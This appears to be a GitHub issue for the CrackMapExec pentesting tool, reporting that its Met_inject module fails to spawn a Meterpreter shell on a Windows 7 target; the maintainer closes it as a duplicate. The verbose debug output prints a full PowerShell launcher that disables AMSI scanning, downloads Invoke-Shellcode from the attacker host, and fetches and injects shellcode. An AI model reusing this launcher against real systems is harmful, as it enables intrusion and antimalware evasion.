search

byt3bl33d3r / CrackMapExec

A swiss army knife for pentesting networks
BSD 2-Clause "Simplified" License
8.46k stars 1.64k forks source link

Met_inject Module Fails to inject Meterpreter shell #240

Closed GhostNaix closed 6 years ago

GhostNaix commented 6 years ago

Steps to reproduce

Execute CrackmapExec with MET_inject module inside a pipenv wrapper environment

Command string used

cme --verbose smb 192.168.1.2 -u HACK -p 1 -M Met_inject -o LHOST=192.168.1.5 LPORT=1111

CME verbose output (using the --verbose flag)

DEBUG Passed args:
{'clear_obfscripts': False,
 'content': False,
 'cred_id': [],
 'darrell': False,
 'depth': None,
 'disks': False,
 'domain': None,
 'exclude_dirs': '',
 'exec_method': None,
 'execute': None,
 'fail_limit': None,
 'force_ps32': False,
 'gen_relay_list': None,
 'gfail_limit': None,
 'groups': None,
 'hash': [],
 'jitter': None,
 'list_modules': False,
 'local_auth': False,
 'local_groups': None,
 'loggedon_users': False,
 'lsa': False,
 'module': 'Met_inject',
 'module_options': ['LHOST=192.168.1.5', 'LPORT=1111'],
 'no_output': False,
 'ntds': None,
 'obfs': False,
 'only_files': False,
 'pass_pol': False,
 'password': ['1'],
 'pattern': None,
 'port': 445,
 'protocol': 'smb',
 'ps_execute': None,
 'regex': None,
 'rid_brute': None,
 'sam': False,
 'server': 'https',
 'server_host': '0.0.0.0',
 'server_port': None,
 'sessions': False,
 'share': 'C$',
 'shares': False,
 'show_module_options': False,
 'spider': None,
 'spider_folder': '.',
 'target': ['192.168.1.2'],
 'threads': 100,
 'timeout': None,
 'ufail_limit': None,
 'username': ['HACK'],
 'users': None,
 'verbose': True,
 'wmi': None,
 'wmi_namespace': 'root\\cimv2'}
DEBUG CME server type: https
SMB         192.168.1.2     445    HACK-PC          [*] Windows 7 Ultimate 7601 Service Pack 1 x64 (name:HACK-PC) (domain:HACK-PC) (signing:False) (SMBv1:True)
DEBUG add_credential(credtype=plaintext, domain=HACK-PC, username=HACK, password=1, groupid=None, pillaged_from=None) => None
SMB         192.168.1.2     445    HACK-PC          [+] HACK-PC\HACK:1 (Pwn3d!)
DEBUG Generated PS IEX Launcher:
 [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
IEX (New-Object Net.WebClient).DownloadString('https://192.168.1.5:443/Invoke-Shellcode.ps1')
$CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {[Char]$_}
        $SumTest = $False
        while ($SumTest -eq $False)
        {
            $GeneratedUri = $CharArray | Get-Random -Count 4
            $SumTest = (([int[]] $GeneratedUri | Measure-Object -Sum).Sum % 0x100 -eq 92)
        }
        $RequestUri = -join $GeneratedUri
        $Request = "https://192.168.1.5:1111/$($RequestUri)"
        $WebClient = New-Object System.Net.WebClient
        [Byte[]]$bytes = $WebClient.DownloadData($Request)
        Invoke-Shellcode -Force -Shellcode $bytes

DEBUG Generated PS command:
 [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
}catch{}

$functions = {
    function Command-ToExecute
    {
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
}catch{}
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
IEX (New-Object Net.WebClient).DownloadString('https://192.168.1.5:443/Invoke-Shellcode.ps1')
$CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {[Char]$_}
        $SumTest = $False
        while ($SumTest -eq $False)
        {
            $GeneratedUri = $CharArray | Get-Random -Count 4
            $SumTest = (([int[]] $GeneratedUri | Measure-Object -Sum).Sum % 0x100 -eq 92)
        }
        $RequestUri = -join $GeneratedUri
        $Request = "https://192.168.1.5:1111/$($RequestUri)"
        $WebClient = New-Object System.Net.WebClient
        [Byte[]]$bytes = $WebClient.DownloadData($Request)
        Invoke-Shellcode -Force -Shellcode $bytes
    }
}
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
{
    $job = Start-Job -InitializationScript $functions -ScriptBlock {Command-ToExecute} -RunAs32
    $job | Wait-Job
}
else
{
    IEX "$functions"
    Command-ToExecute
}

DEBUG Error executing command via wmiexec, traceback:
Traceback (most recent call last):
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/gevent/greenlet.py", line 536, in run
    result = self._run(*self.args, **self.kwargs)
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 108, in __init__
    connection.__init__(self, args, db, host)
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 41, in __init__
    self.proto_flow()
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 75, in proto_flow
    self.call_modules()
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 105, in call_modules
    self.module.on_admin_login(context, self)
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/modules/met_inject.py", line 65, in on_admin_login
    connection.ps_execute(launcher, force_ps32=True)
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 17, in _decorator
    return func(self, *args, **kwargs)
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 445, in ps_execute
    return self.execute(create_ps_command(payload, force_ps32=force_ps32, dont_obfs=dont_obfs), get_output, methods)
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 17, in _decorator
    return func(self, *args, **kwargs)
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 81, in _decorator
    output = func(self, *args, **kwargs)
  File "/root/.local/share/virtualenvs/CrackMapExec-W8h2f6uM/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 394, in execute
    logging.debug(format_exc())
NameError: global name 'format_exc' is not defined
Fri Mar  2 22:47:53 2018 <Greenlet at 0x7f6bb721ecd0: smb(Namespace(clear_obfscripts=False, content=False, c, <protocol.database instance at 0x7f6bb8197758>, '192.168.1.2')> failed with NameError

CME Version (cme --version)

(CrackMapExec-W8h2f6uM) root@HacknetOS:~/CrackMapExec# cme --version
4.0.1dev - Bug Pr0n

OS

(CrackMapExec-W8h2f6uM) root@HacknetOS:~/CrackMapExec# lsb_release -a
No LSB modules are available.
Distributor ID: Kali
Description:    Kali GNU/Linux Rolling
Release:    kali-rolling
Codename:   kali-rolling
(CrackMapExec-W8h2f6uM) root@HacknetOS:~/CrackMapExec# uname -a
Linux HacknetOS 4.14.0-kali3-amd64 #1 SMP Debian 4.14.13-1kali1 (2018-01-25) x86_64 GNU/Linux
(CrackMapExec-W8h2f6uM) root@HacknetOS:~/CrackMapExec#

Target OS

Windows 7 SP1 x64

Detailed issue explanation

It Seems that the module fails to spawn a Meterpreter shell on the remote system after successful SMB authentication

byt3bl33d3r commented 6 years ago

Duplicate of #223. Please track this issue there.

Closing.